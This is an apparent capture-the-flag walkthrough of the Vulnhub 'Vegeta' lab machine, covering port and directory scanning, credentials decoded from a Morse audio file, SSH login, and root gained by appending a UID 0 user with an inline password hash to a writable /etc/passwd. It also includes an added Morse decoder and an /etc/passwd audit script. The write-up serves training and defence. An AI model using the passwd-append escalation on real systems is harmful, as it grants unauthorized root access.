[VLN] Vegeta

Today we are going to hack the Vulnhub machine called Vegeta. You can download it from the following link: https://www.vulnhub.com/entry/vegeta-1,501/
  • Enumeration
    We start with an nmap scan to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.100
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-29 13:26 CEST
    Nmap scan report for Vegeta.home (192.168.1.100)
    Host is up (0.00043s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba (RSA)
    |   256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 (ECDSA)
    |_  256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 (ED25519)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Site doesn't have a title (text/html).
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
    sml@Cassandra:/usr/share/seclists/Discovery/Web-Content$ gobuster dir -u http://192.168.1.100 -w directory-list-2.3-big.txt -x php,html
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.1.100
    [+] Threads:        10
    [+] Wordlist:       directory-list-2.3-big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,html
    [+] Timeout:        10s
    ===============================================================
    2020/06/29 13:29:26 Starting gobuster
    ===============================================================
    /index.html (Status: 200)
    /img (Status: 301)
    /login.php (Status: 200)
    /image (Status: 301)
    /admin (Status: 301)
    /manual (Status: 301)
    /server-status (Status: 403)
    /bulma (Status: 301)
    /logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQfsclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0QQsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsorefinesearchZ1.html (Status: 403)
    ===============================================================
    2020/06/29 13:47:52 Finished
    ===============================================================
    We see an interesting directory: /bulma. When we visit it we find a .wav file, which we download. Once downloaded, we go to the following page: https://morsecode.world/international/decoder/audio-decoder-adaptive.html
    We upload the audio, and it finally shows us:
    USER : TRUNKS
    PASSWORD : US3R(S IN DOLLARS SYMBOL)
    Looks like these are the credentials :) Let's try them!
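    The step the online decoder performs on that .wav file is envelope detection followed by timing classification. The block below is an added example, not part of the original write-up and not the morsecode.world decoder's own code: it synthesises an on/off-keyed tone for a message and then recovers the text the same way a decoder would. The sample rate, tone frequency and dit length are assumptions chosen for the synthetic signal; on a real recording the dit length is estimated from the shortest tone, which is what decode() already does.

```python
"""Decode tone-keyed Morse audio (added example, not the page's own code)."""
import math

MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z", "-----": "0", ".----": "1", "..---": "2",
    "...--": "3", "....-": "4", ".....": "5", "-....": "6", "--...": "7",
    "---..": "8", "----.": "9", "---...": ":",
}
TEXT_TO_MORSE = {v: k for k, v in MORSE.items()}

RATE = 8000          # samples per second (assumption)
TONE_HZ = 700.0      # keyed tone frequency (assumption)
UNIT_SAMPLES = 480   # one dit = 60 ms at 8 kHz (assumption; a multiple of BLOCK)
BLOCK = 40           # envelope block size in samples (5 ms)


def synthesize(message):
    """Key TONE_HZ on/off for `message` using standard 1/3 unit tones, 1/3/7 unit gaps."""
    def tone(units):
        return [math.sin(2 * math.pi * TONE_HZ * i / RATE)
                for i in range(units * UNIT_SAMPLES)]

    def gap(units):
        return [0.0] * (units * UNIT_SAMPLES)

    samples = []
    for wi, word in enumerate(message.upper().split(" ")):
        if wi:
            samples += gap(7)                 # word gap
        for ci, ch in enumerate(word):
            if ci:
                samples += gap(3)             # letter gap
            for si, sym in enumerate(TEXT_TO_MORSE[ch]):
                if si:
                    samples += gap(1)         # gap between dits/dahs of one letter
                samples += tone(1 if sym == "." else 3)
    return samples


def envelope(samples, block=BLOCK):
    """Rectify and block-average: one amplitude value per `block` samples."""
    return [sum(abs(s) for s in samples[i:i + block]) / block
            for i in range(0, len(samples) - block + 1, block)]


def runs(env, threshold=0.3):
    """Collapse the envelope into (tone_on, length_in_blocks) runs."""
    out = []
    for v in env:
        on = v > threshold
        if out and out[-1][0] == on:
            out[-1][1] += 1
        else:
            out.append([on, 1])
    return [(on, n) for on, n in out]


def decode(samples):
    """Recover text: tone runs become dit/dah, gaps become symbol/letter/word breaks."""
    rl = runs(envelope(samples))
    tone_lengths = [n for on, n in rl if on]
    if not tone_lengths:
        return ""
    unit = min(tone_lengths)      # the shortest tone is a dit; all timing scales from it
    code, out = "", []
    for on, n in rl:
        if on:
            code += "." if n < 2 * unit else "-"
        elif n >= 2 * unit:       # shorter gaps separate symbols inside one letter
            if code:
                out.append(MORSE.get(code, "?"))
                code = ""
            if n >= 5 * unit and out:
                out.append(" ")   # word gap (nominally 7 units)
    if code:
        out.append(MORSE.get(code, "?"))
    return "".join(out).strip()


if __name__ == "__main__":
    # Constructed message with the same shape as the decoder output quoted above.
    print(decode(synthesize("USER : TRUNKS")))
```

    The threshold of 0.3 works because a rectified full-scale sine averages about 0.64 per block while silence averages 0; a noisy recording would instead need the threshold set relative to the loudest blocks.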
  • Low Shell
    sml@Cassandra:~$ ssh trunks@192.168.1.100
    trunks@192.168.1.100's password:
    Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.

    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72
    trunks@Vegeta:~$
    Now that we are inside the system, we dig around a bit more...
    trunks@Vegeta:~$ cat .bash_history
    perl -le 'print crypt("Password@973","addedsalt")'
    echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
    echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
    ls
    su Tom
    ls -la
    cat .bash_history
    sudo apt-get install vim
    apt-get install vim
    su root
    cat .bash_history
    exit
    We see that the history contains commands that try to modify /etc/passwd to add a user Tom with UID and GID 0 (i.e. root). Let's take a look at the permissions on /etc/passwd.
    trunks@Vegeta:~$ ls -l /etc/passwd
    -rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd
    We see that the user trunks has write permission on it. Knowing this, we run the command from the history to create the user Tom, and then log in as Tom to get a root account!
  • Privilege Escalation
    We run the following command to add Tom to the system...
    trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
    We log in as Tom (password Password@973).
    trunks@Vegeta:~$ su Tom
    Password:
    root@Vegeta:/home/trunks#
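    The escalation above works because of two conditions that are easy to check for: /etc/passwd is writable by a non-root user (the ls -l output), and the login stack accepts a password hash placed directly in field 2 of a passwd entry, so the writer of the file gets to choose the password for a UID 0 account. The block below is an added example, not part of the original write-up: it audits an /etc/passwd-style text for exactly those weaknesses. SAMPLE_PASSWD is constructed to mirror the box after the echo >> /etc/passwd step (the Tom line is the one from the history); the owner uid 1000 for trunks is an assumption, and the file's owner and mode are passed in explicitly so the checks run offline on the sample. audit_file() applies the same checks to a real path.

```python
"""Audit /etc/passwd for a writable file and for UID 0 / inline-hash entries (added example)."""
import os
import stat

# Constructed sample: the box after 'echo "Tom:..." >> /etc/passwd'.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
trunks:x:1000:1000:trunks,,,:/home/trunks:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

# Field-2 values that mean "the hash lives in /etc/shadow" or "account locked".
SHADOWED = {"x", "*", "!", "!!"}


def audit_entries(text):
    """Return (line_no, username, finding) for every risky passwd entry."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, line, "malformed entry: expected 7 fields"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw == "":
            findings.append((n, name, "empty password field: login without a password"))
        elif pw not in SHADOWED:
            # pam_unix only consults /etc/shadow when field 2 is 'x'; any other
            # value is used as the hash itself, so whoever can write this file
            # chooses the account's password.
            findings.append((n, name, "inline password hash instead of 'x'"))
        if uid == "0" and name != "root":
            findings.append((n, name, "UID 0 granted to a non-root account"))
    return findings


def audit_metadata(owner_uid, mode):
    """Ownership/permission check: /etc/passwd should be owned by root, mode 0644."""
    findings = []
    if owner_uid != 0:
        findings.append(f"owned by uid {owner_uid}, expected root (0): owner can rewrite accounts")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_file(path="/etc/passwd"):
    """Run both audits against a real file; returns (metadata_findings, entry_findings)."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return audit_metadata(st.st_uid, stat.S_IMODE(st.st_mode)), audit_entries(text)


if __name__ == "__main__":
    # Mode 0644 and owner trunks as shown by 'ls -l /etc/passwd' on the box;
    # uid 1000 for trunks is an assumption.
    for f in audit_metadata(1000, 0o644):
        print("FINDING (file):", f)
    for n, user, msg in audit_entries(SAMPLE_PASSWD):
        print(f"FINDING (line {n}, {user}):", msg)
```

    On the sample this reports the wrong owner plus two findings on line 4, which is the whole attack path in three lines of output; the same checks are cheap enough to run from a cron job or a configuration-management compliance test.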
  • root.txt
    root@Vegeta:/home/trunks# cd /root
    root@Vegeta:~# ls
    root.txt
    root@Vegeta:~# cat root.txt
    [ASCII-art banner reading "V E G I I T A"; the artwork itself did not survive extraction]
    Hurray you got root
    Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw
  • End
    And with that we are root on the machine :)